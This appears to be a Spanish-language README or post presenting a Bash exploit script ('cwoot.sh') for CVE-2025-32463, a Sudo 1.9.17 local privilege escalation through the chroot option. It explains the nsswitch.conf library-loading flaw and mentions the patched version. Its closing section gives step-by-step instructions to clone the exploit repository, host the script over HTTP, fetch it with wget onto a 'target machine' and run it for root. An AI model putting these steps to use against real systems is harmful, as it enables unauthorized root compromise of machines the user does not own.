
Script de exploit en Bash para CVE-2025-32463, una vulnerabilidad de escalada local de privilegios en Sudo 1.9.17 mediante la opción chroot, que permite acceso root en sistemas afectados.
La versión 1.9.17 de Sudo tiene una vulnerabilidad crítica (CVE-2025-32463) que permite a usuarios locales obtener acceso root explotando la opción chroot, lo que puede conllevar graves riesgos de seguridad. Se recomienda a los usuarios actualizar a la versión 1.9.17p1 o posterior para mitigar este problema.
Resumen de la vulnerabilidad de Sudo 1.9.17:-
La vulnerabilidad en la versión 1.9.17 de Sudo, identificada como CVE-2025-32463, es una falla crítica que permite a usuarios locales obtener acceso root. Este problema surge de un cambio en la forma en que Sudo maneja la opción --chroot (-R), que está diseñada para aislar procesos cambiando su directorio raíz.
Cómo funciona la vulnerabilidad:-
Problema de resolución de rutas: En las versiones 1.9.14 a 1.9.17, Sudo evalúa la opción --chroot antes de verificar los permisos del usuario. Esto permite a los atacantes controlar el entorno y cargar bibliotecas maliciosas.
Pasos de explotación:
Un atacante crea un archivo nsswitch.conf malicioso en un directorio que controla. Ejecuta Sudo con la opción -R, lo que hace que Sudo cargue la configuración y bibliotecas del atacante, otorgando acceso root.
He creado un script bash "cwoot.sh" que, tras su ejecución, elevará directamente al usuario root.
Haz lo siguiente:
Descargar el script del repositorio: git clone https://github.com/justjoeyking/CVE-2025-32463.git
En la máquina propia: python3 -m http.server 8080
En la máquina objetivo: wget http://<own_IP_address>:8080/cwoot.sh
En la máquina objetivo: chmod 755 cwoot.sh
Ejecutar script en la máquina objetivo: ./cwoot.sh